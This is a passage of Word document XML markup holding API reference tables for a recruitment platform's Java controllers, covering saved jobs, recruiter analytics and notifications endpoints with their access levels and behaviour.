                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Returns verified enterprise employers with company logos and descriptions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: SavedJobController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/saved-jobs | Primary Domain: Candidate Bookmarks Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>JobService, UserService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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/saved-jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / List&lt;JobDto&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Returns candidate's bookmarked job vacancies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/saved-jobs/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created / { message }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bookmarks a job vacancy (enforced by unique constraint on user_id, job_id).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DELETE /api/saved-jobs/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / { message }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Removes vacancy from candidate bookmarks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: AnalyticsController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/analytics | Primary Domain: Recruitment Conversion Metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>AnalyticsService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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/analytics/recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / RecruiterAnalyticsDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Computes funnel conversion rates across ATS stages, average days to hire, and pipeline velocity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: NotificationController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/notifications | Primary Domain: In-App Alerts &amp; Activity Stream</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>NotificationService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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/notifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / List&lt;NotificationDto&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
